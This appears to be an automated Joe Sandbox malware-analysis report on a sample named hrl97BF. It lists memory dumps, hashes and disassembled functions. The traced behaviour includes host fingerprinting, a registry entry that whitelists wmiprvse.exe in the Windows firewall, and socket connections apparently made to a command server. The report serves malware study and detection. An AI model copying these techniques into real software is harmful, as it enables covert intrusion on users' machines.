Associated: 00000006.00000002.2015180018.0000000000430000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015213526.0000000000436000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015246635.0000000000437000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015280644.000000000043C000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015317535.000000000043E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015349617.000000000043F000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015382690.0000000000444000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015416441.0000000000445000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015458095.000000000044A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015494843.000000000044C000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015528471.0000000000452000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015562799.0000000000453000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015596431.0000000000458000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015635043.000000000045A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015668372.000000000045B000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015702055.0000000000460000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015736897.0000000000461000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015772590.0000000000466000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015806142.0000000000468000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015842352.0000000000469000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015875687.000000000046E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015907050.000000000046F000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015944598.0000000000474000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015978096.0000000000476000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2016014832.000000000047D000.00000080.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_hrl97BF.jbxd

Yara matches

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: 2941891f3795c6f05a293b06209a9f50f08dfe53ecc95c981ceb5e51ef49c74a
Instruction ID: a1d831deead5511c42865662fe48a5713adfdc2882c533367e09d43fbcf8ea79
Opcode Fuzzy Hash: 2941891f3795c6f05a293b06209a9f50f08dfe53ecc95c981ceb5e51ef49c74a
Instruction Fuzzy Hash: 2621797A5056219FCB15FA19DA822EDB3E1FF41724B501D1FFA818B201C6A89E47C7CA

Function 00482C65 Relevance: 1.3, APIs: 1, Instructions: 29COMMON

Download Yara Rule

APIs

CloseHandle.KERNELBASE(00000004,CA1AE9E0,?,?,?,?,?,?,?,?,?,?,?,?,?,07704390), ref: 00482C82

Memory Dump Source

Source File: 00000006.00000002.2016049473.0000000000482000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2014725154.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014756449.0000000000401000.00000020.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014788210.0000000000406000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014819168.0000000000408000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014850226.000000000040A000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014883689.0000000000411000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014914420.0000000000414000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014948163.000000000041A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014980693.000000000041B000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015012838.0000000000420000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015046451.0000000000422000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015078963.0000000000428000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015111287.0000000000429000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015145266.000000000042E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015180018.0000000000430000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015213526.0000000000436000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015246635.0000000000437000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015280644.000000000043C000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015317535.000000000043E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015349617.000000000043F000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015382690.0000000000444000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015416441.0000000000445000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015458095.000000000044A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015494843.000000000044C000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015528471.0000000000452000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015562799.0000000000453000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015596431.0000000000458000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015635043.000000000045A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015668372.000000000045B000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015702055.0000000000460000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015736897.0000000000461000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015772590.0000000000466000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015806142.0000000000468000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015842352.0000000000469000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015875687.000000000046E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015907050.000000000046F000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015944598.0000000000474000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015978096.0000000000476000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2016014832.000000000047D000.00000080.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_hrl97BF.jbxd

Yara matches

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: 2ef6b8e0adac193261cfa0d2a5bee3fdbc2c21d07b809aa780d6ca7f1990f43e
Instruction ID: 91acae21fac1e4a6c4b2e5db99c7eb7ecfa0cfdef3ce7ae895fde2adf8682098
Opcode Fuzzy Hash: 2ef6b8e0adac193261cfa0d2a5bee3fdbc2c21d07b809aa780d6ca7f1990f43e
Instruction Fuzzy Hash: C3E0D8365246189ECA10BA59EE524DD77E1FEC1724B504E1BE581460419B142E4797CA

Function 006F05BA Relevance: 1.3, APIs: 1, Instructions: 7sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(0000000A,006F085C,?,00000000,00000000,-00003C38,00000002,00000000,?,00000000), ref: 006F05C1

Memory Dump Source

Source File: 00000006.00000002.2016226259.00000000006F0000.00000040.10000000.00040000.00000000.sdmp, Offset: 006F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6f0000_hrl97BF.jbxd

Yara matches

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 3c1f989dfd13240381299ec7adf5382b251643946d8aa86ca05208ab7bb78418
Instruction ID: 8e38509498ebbc421bcd9654a0d47e5d1dae4e12dcac8f1ca07d3f21ad76a767
Opcode Fuzzy Hash: 3c1f989dfd13240381299ec7adf5382b251643946d8aa86ca05208ab7bb78418
Instruction Fuzzy Hash: D3B0126824030895FA140960460DB2416267F00B11FE00059E7064C0C107E407011C09

Non-executed Functions

Function 00402F70 Relevance: 66.7, APIs: 14, Strings: 24, Instructions: 199stringCOMMON

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(00000800,00000002,?,00000040,?,76F8F550,76F90BD0,00000072), ref: 00402F8B
GetComputerNameA.KERNEL32 ref: 00402FA2
lstrcpyA.KERNEL32(?,SOFTWARE\Microsoft\Windows NT\CurrentVersion), ref: 00402FBB
strstr.MSVCRT ref: 00403024
strstr.MSVCRT ref: 00403052
strstr.MSVCRT ref: 00403075
lstrcpyA.KERNEL32(?,Windows NT), ref: 00403114
lstrcpyA.KERNEL32(?,HARDWARE\DESCRIPTION\System\CentralProcessor\0), ref: 0040313D
GlobalMemoryStatusEx.KERNEL32(?), ref: 004031C5
lstrcpyA.KERNEL32(?,20108L), ref: 00403201
GetTickCount.KERNEL32 ref: 0040320C

Strings

%u MHz, xrefs: 004031AD
ProductName, xrefs: 00402FF5
47@, xrefs: 00403003, 0040318B
Windows 2003, xrefs: 00403084
2003, xrefs: 0040306F
Windows 7, xrefs: 00403100
Windows XP, xrefs: 00403061
SOFTWARE\Microsoft\Windows NT\CurrentVersion, xrefs: 00402FB5
<6@, xrefs: 004031A0
20108L, xrefs: 004031FB
Windows NT, xrefs: 00403108
F7@, xrefs: 00402FD7, 00403157
%u MB, xrefs: 004031EA
Windows 2000, xrefs: 00403033
"7@, xrefs: 0040300E, 00403196
2000, xrefs: 0040301E
HARDWARE\DESCRIPTION\System\CentralProcessor\0, xrefs: 00403136
2008, xrefs: 004030C1
@, xrefs: 004031BC
~MHz, xrefs: 00403175
Windows 2008, xrefs: 004030DA
Windows Vista, xrefs: 004030AF
Vista, xrefs: 0040309A
@, xrefs: 00402F9A

Memory Dump Source

Source File: 00000006.00000002.2014756449.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2014725154.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014788210.0000000000406000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014819168.0000000000408000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014850226.000000000040A000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014883689.0000000000411000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014914420.0000000000414000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014948163.000000000041A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014980693.000000000041B000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015012838.0000000000420000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015046451.0000000000422000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015078963.0000000000428000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015111287.0000000000429000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015145266.000000000042E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015180018.0000000000430000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015213526.0000000000436000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015246635.0000000000437000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015280644.000000000043C000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015317535.000000000043E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015349617.000000000043F000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015382690.0000000000444000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015416441.0000000000445000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015458095.000000000044A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015494843.000000000044C000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015528471.0000000000452000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015562799.0000000000453000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015596431.0000000000458000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015635043.000000000045A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015668372.000000000045B000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015702055.0000000000460000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015736897.0000000000461000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015772590.0000000000466000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015806142.0000000000468000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015842352.0000000000469000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015875687.000000000046E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015907050.000000000046F000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015944598.0000000000474000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015978096.0000000000476000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2016014832.000000000047D000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2016049473.0000000000482000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_hrl97BF.jbxd

Yara matches

Similarity

API ID: lstrcpy$strstr$ComputerCountGlobalInfoLocaleMemoryNameStatusTick
String ID: "7@$%u MB$%u MHz$2000$2003$2008$20108L$47@$<6@$@$@$F7@$HARDWARE\DESCRIPTION\System\CentralProcessor\0$ProductName$SOFTWARE\Microsoft\Windows NT\CurrentVersion$Vista$Windows 2000$Windows 2003$Windows 2008$Windows 7$Windows NT$Windows Vista$Windows XP$~MHz
API String ID: 13981014-3306235746
Opcode ID: a7db7102705653c934fd47b61ca4cdcb3c0d92441ed082312b1d186f1afde4d2
Instruction ID: 8024c398b29a2f099fa7e41a4c2d81eb78002d16970cbed0a3e220c746c77202
Opcode Fuzzy Hash: a7db7102705653c934fd47b61ca4cdcb3c0d92441ed082312b1d186f1afde4d2
Instruction Fuzzy Hash: A7614170144305BFD710DF60DD45FAB7BA8AB88745F10493EF585B22D0EA78AA09CF6A

Function 006F3C3D Relevance: 46.0, APIs: 21, Strings: 5, Instructions: 487libraryloaderCOMMON

Download Yara Rule

APIs

GetWindowsDirectoryA.KERNEL32(020a00 . . :#a260b0403 +*,00000104), ref: 006F3CA1
GetProcAddress.KERNEL32(00000000,00000002), ref: 006F3CD4
GetProcAddress.KERNEL32(00000000,006F3D41), ref: 006F3D4C
LoadLibraryA.KERNEL32(ADVAPI32.DLL), ref: 006F3D5F
GetTickCount.KERNEL32 ref: 006F3D93
GetVolumeInformationA.KERNEL32(00000000,00000000,00000000,006F6EF6,00000000,00000000,00000000,00000000), ref: 006F3E65
GetModuleFileNameA.KERNEL32(00000000,020a00 . . :#a260b0403 +*,000000C8), ref: 006F3EE2

Strings

SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List, xrefs: 006F3F0C
ADVAPI32.DLL, xrefs: 006F3D5E
020a00 . . :#a260b0403 +*, xrefs: 006F3CA0, 006F3D06, 006F3D16, 006F3EDF, 006F3EF4, 006F3F0B, 006F4195, 006F41DB
C:\Windows\sysWOW64\wbem\wmiprvse.exe:*:enabled:@shell32.dll,-1, xrefs: 006F3EF6, 006F3F08
C:\WINDOWS\SYSTEM32\UXTHEME.DLL, xrefs: 006F41DA

Memory Dump Source

Source File: 00000006.00000002.2016226259.00000000006F0000.00000040.10000000.00040000.00000000.sdmp, Offset: 006F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6f0000_hrl97BF.jbxd

Yara matches

Similarity

API ID: AddressProc$CountDirectoryFileInformationLibraryLoadModuleNameTickVolumeWindows
String ID: 020a00 . . :#a260b0403 +*$ADVAPI32.DLL$C:\WINDOWS\SYSTEM32\UXTHEME.DLL$C:\Windows\sysWOW64\wbem\wmiprvse.exe:*:enabled:@shell32.dll,-1$SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List
API String ID: 1749273276-768470111
Opcode ID: f516923bb6111dac5ea2ce27cbf4c730b644d8035d3db586d383e9b78a19a3eb
Instruction ID: a0ba6e6d3bc113b69b1f5e1fc6d7d5f2fa4d3b84310b91c8d60555ba87f00ca7
Opcode Fuzzy Hash: f516923bb6111dac5ea2ce27cbf4c730b644d8035d3db586d383e9b78a19a3eb
Instruction Fuzzy Hash: 2F02F37140825CBFEB21AF248C5ABFA7BADEF41300F00451DEA499E282D7F45F4587A6

Function 006F3CC2 Relevance: 44.2, APIs: 20, Strings: 5, Instructions: 432libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(006F3CBA), ref: 006F3CC2
GetProcAddress.KERNEL32(00000000,00000002), ref: 006F3CD4
GetProcAddress.KERNEL32(00000000,006F3D41), ref: 006F3D4C
LoadLibraryA.KERNEL32(ADVAPI32.DLL), ref: 006F3D5F
GetTickCount.KERNEL32 ref: 006F3D93

Strings

SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List, xrefs: 006F3F0C
ADVAPI32.DLL, xrefs: 006F3D5E
020a00 . . :#a260b0403 +*, xrefs: 006F3D16, 006F3EDF, 006F3EF4, 006F3F0B, 006F4195, 006F41DB
C:\Windows\sysWOW64\wbem\wmiprvse.exe:*:enabled:@shell32.dll,-1, xrefs: 006F3EF6, 006F3F08
C:\WINDOWS\SYSTEM32\UXTHEME.DLL, xrefs: 006F41DA

Memory Dump Source

Source File: 00000006.00000002.2016226259.00000000006F0000.00000040.10000000.00040000.00000000.sdmp, Offset: 006F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6f0000_hrl97BF.jbxd

Yara matches

Similarity

API ID: AddressProc$CountHandleLibraryLoadModuleTick
String ID: 020a00 . . :#a260b0403 +*$ADVAPI32.DLL$C:\WINDOWS\SYSTEM32\UXTHEME.DLL$C:\Windows\sysWOW64\wbem\wmiprvse.exe:*:enabled:@shell32.dll,-1$SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List
API String ID: 2837544101-768470111
Opcode ID: 5b48797bfded511fe3541d43c5fd4cc9561b065424dfc698fabc9acd851576a7
Instruction ID: 74323f49a4952a38d974d29f5c6d413713b17415e41bb0d94119f0fa3e076ab2
Opcode Fuzzy Hash: 5b48797bfded511fe3541d43c5fd4cc9561b065424dfc698fabc9acd851576a7
Instruction Fuzzy Hash: 40E1017140825DBFEB25AF248C1ABFA7BADEF41300F00055DEE499E182DAF45F458BA5

Function 006F3CF0 Relevance: 44.2, APIs: 20, Strings: 5, Instructions: 409COMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(006F3CE5), ref: 006F3CF0
GetSystemDirectoryA.KERNEL32(020a00 . . :#a260b0403 +*,00000104), ref: 006F3D07

Part of subcall function 006F3D1F: lstrcat.KERNEL32(020a00 . . :#a260b0403 +*,006F3D12), ref: 006F3D20
Part of subcall function 006F3D1F: GetProcAddress.KERNEL32(00000000,006F3D41), ref: 006F3D4C
Part of subcall function 006F3D1F: LoadLibraryA.KERNEL32(ADVAPI32.DLL), ref: 006F3D5F
Part of subcall function 006F3D1F: GetTickCount.KERNEL32 ref: 006F3D93
Part of subcall function 006F3D1F: GetVolumeInformationA.KERNEL32(00000000,00000000,00000000,006F6EF6,00000000,00000000,00000000,00000000), ref: 006F3E65

Strings

SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List, xrefs: 006F3F0C
ADVAPI32.DLL, xrefs: 006F3D5E
020a00 . . :#a260b0403 +*, xrefs: 006F3D06, 006F3D16, 006F3EDF, 006F3EF4, 006F3F0B, 006F4195, 006F41DB
C:\Windows\sysWOW64\wbem\wmiprvse.exe:*:enabled:@shell32.dll,-1, xrefs: 006F3EF6, 006F3F08
C:\WINDOWS\SYSTEM32\UXTHEME.DLL, xrefs: 006F41DA

Memory Dump Source

Source File: 00000006.00000002.2016226259.00000000006F0000.00000040.10000000.00040000.00000000.sdmp, Offset: 006F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6f0000_hrl97BF.jbxd

Yara matches

Similarity

API ID: AddressCountDirectoryHandleInformationLibraryLoadModuleProcSystemTickVolumelstrcat
String ID: 020a00 . . :#a260b0403 +*$ADVAPI32.DLL$C:\WINDOWS\SYSTEM32\UXTHEME.DLL$C:\Windows\sysWOW64\wbem\wmiprvse.exe:*:enabled:@shell32.dll,-1$SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List
API String ID: 215653160-768470111
Opcode ID: 260c0d83971146764b612a54da98fff840ddc31a6bb3a69eed28180f54add843
Instruction ID: afb84019b8b68c6d7b9571909d73c13b4f8f17c51e37a8dbfd162ac52b490ac8
Opcode Fuzzy Hash: 260c0d83971146764b612a54da98fff840ddc31a6bb3a69eed28180f54add843
Instruction Fuzzy Hash: BFE1F07140825CBFEB25AF248C1ABFA7BADEF41300F00455DEA499E182DAF45F458BA5

Function 006F3D1F Relevance: 42.4, APIs: 19, Strings: 5, Instructions: 389stringCOMMON

Download Yara Rule

APIs

lstrcat.KERNEL32(020a00 . . :#a260b0403 +*,006F3D12), ref: 006F3D20

Part of subcall function 006F3D36: LoadLibraryA.KERNEL32(006F3D2B), ref: 006F3D36
Part of subcall function 006F3D36: GetProcAddress.KERNEL32(00000000,006F3D41), ref: 006F3D4C
Part of subcall function 006F3D36: LoadLibraryA.KERNEL32(ADVAPI32.DLL), ref: 006F3D5F
Part of subcall function 006F3D36: GetTickCount.KERNEL32 ref: 006F3D93
Part of subcall function 006F3D36: GetVolumeInformationA.KERNEL32(00000000,00000000,00000000,006F6EF6,00000000,00000000,00000000,00000000), ref: 006F3E65

Strings

SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List, xrefs: 006F3F0C
ADVAPI32.DLL, xrefs: 006F3D5E
020a00 . . :#a260b0403 +*, xrefs: 006F3D1F, 006F3EDF, 006F3EF4, 006F3F0B, 006F4195, 006F41DB
C:\Windows\sysWOW64\wbem\wmiprvse.exe:*:enabled:@shell32.dll,-1, xrefs: 006F3EF6, 006F3F08
C:\WINDOWS\SYSTEM32\UXTHEME.DLL, xrefs: 006F41DA

Memory Dump Source

Source File: 00000006.00000002.2016226259.00000000006F0000.00000040.10000000.00040000.00000000.sdmp, Offset: 006F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6f0000_hrl97BF.jbxd

Yara matches

Similarity

API ID: LibraryLoad$AddressCountInformationProcTickVolumelstrcat
String ID: 020a00 . . :#a260b0403 +*$ADVAPI32.DLL$C:\WINDOWS\SYSTEM32\UXTHEME.DLL$C:\Windows\sysWOW64\wbem\wmiprvse.exe:*:enabled:@shell32.dll,-1$SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List
API String ID: 2038497427-768470111
Opcode ID: 9a3d42354aede4d92b231a7e1a08d8f1ff67a071c39a48690dfdf21ca6a4930c
Instruction ID: 897467fe55107d2af7e259db4634c94d5a1fb076760bd355d1ee5ec32d6fdbdb
Opcode Fuzzy Hash: 9a3d42354aede4d92b231a7e1a08d8f1ff67a071c39a48690dfdf21ca6a4930c
Instruction Fuzzy Hash: 71E1F17150825CBFEB25AF248C1ABFA7BADEF41300F00055DEE499E282DAF45F458B65

Function 006F3D36 Relevance: 42.4, APIs: 19, Strings: 5, Instructions: 379libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(006F3D2B), ref: 006F3D36

Part of subcall function 006F3D4B: GetProcAddress.KERNEL32(00000000,006F3D41), ref: 006F3D4C
Part of subcall function 006F3D4B: LoadLibraryA.KERNEL32(ADVAPI32.DLL), ref: 006F3D5F
Part of subcall function 006F3D4B: GetTickCount.KERNEL32 ref: 006F3D93
Part of subcall function 006F3D4B: GetVolumeInformationA.KERNEL32(00000000,00000000,00000000,006F6EF6,00000000,00000000,00000000,00000000), ref: 006F3E65

Strings

SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List, xrefs: 006F3F0C
ADVAPI32.DLL, xrefs: 006F3D5E
020a00 . . :#a260b0403 +*, xrefs: 006F3EDF, 006F3EF4, 006F3F0B, 006F4195, 006F41DB
C:\Windows\sysWOW64\wbem\wmiprvse.exe:*:enabled:@shell32.dll,-1, xrefs: 006F3EF6, 006F3F08
C:\WINDOWS\SYSTEM32\UXTHEME.DLL, xrefs: 006F41DA

Memory Dump Source

Source File: 00000006.00000002.2016226259.00000000006F0000.00000040.10000000.00040000.00000000.sdmp, Offset: 006F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6f0000_hrl97BF.jbxd

Yara matches

Similarity

API ID: LibraryLoad$AddressCountInformationProcTickVolume
String ID: 020a00 . . :#a260b0403 +*$ADVAPI32.DLL$C:\WINDOWS\SYSTEM32\UXTHEME.DLL$C:\Windows\sysWOW64\wbem\wmiprvse.exe:*:enabled:@shell32.dll,-1$SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List
API String ID: 3734769084-768470111
Opcode ID: fe378de023044d5e93c1fdb9f401057012e9a432939cf19daad1b95bd79d3ac1
Instruction ID: 5f572ada8208eda2f220439245cc3a9091fbb70ae7d8e7fdfd2c472bc6c06283
Opcode Fuzzy Hash: fe378de023044d5e93c1fdb9f401057012e9a432939cf19daad1b95bd79d3ac1
Instruction Fuzzy Hash: D4D1E17140425DBFEB25AF24CC1ABFA7BAEEF41300F000559EE499E282DAF45F458B65

Function 006F3D4B Relevance: 40.6, APIs: 18, Strings: 5, Instructions: 386librarythreadnetworkCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(00000000,006F3D41), ref: 006F3D4C
LoadLibraryA.KERNEL32(ADVAPI32.DLL), ref: 006F3D5F
GetTickCount.KERNEL32 ref: 006F3D93
GetVolumeInformationA.KERNEL32(00000000,00000000,00000000,006F6EF6,00000000,00000000,00000000,00000000), ref: 006F3E65
GetModuleFileNameA.KERNEL32(00000000,020a00 . . :#a260b0403 +*,000000C8), ref: 006F3EE2
wsprintfA.USER32 ref: 006F3EF7
CreateThread.KERNEL32(00000000,00000000,006F3691,00000000,00000000), ref: 006F3F40
CloseHandle.KERNEL32(?,1C567C50), ref: 006F3F49
CreateThread.KERNEL32(00000000,00000000,Function_00003888,00000000,00000000), ref: 006F3FE9
CloseHandle.KERNEL32(?,00000000), ref: 006F3FF2
CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,00000000), ref: 006F3FFF
socket.WS2_32(00000002,00000001,00000000), ref: 006F4097
connect.WS2_32(6F6C6902,006F3B09,00000010), ref: 006F40B1
GetVersionExA.KERNEL32(?,?,00000000), ref: 006F40FB
wsprintfA.USER32 ref: 006F4179
SetEvent.KERNEL32(0000040C,?,00000000), ref: 006F42D6
Sleep.KERNEL32(00007530,?,00000000), ref: 006F42F7
ResetEvent.KERNEL32(0000040C,?,00000000), ref: 006F430A

Strings

SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List, xrefs: 006F3F0C
ADVAPI32.DLL, xrefs: 006F3D5E
020a00 . . :#a260b0403 +*, xrefs: 006F3EDF, 006F3EF4, 006F3F0B, 006F4195, 006F41DB
C:\Windows\sysWOW64\wbem\wmiprvse.exe:*:enabled:@shell32.dll,-1, xrefs: 006F3EF6, 006F3F08
C:\WINDOWS\SYSTEM32\UXTHEME.DLL, xrefs: 006F41DA

Memory Dump Source

Source File: 00000006.00000002.2016226259.00000000006F0000.00000040.10000000.00040000.00000000.sdmp, Offset: 006F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6f0000_hrl97BF.jbxd

Yara matches

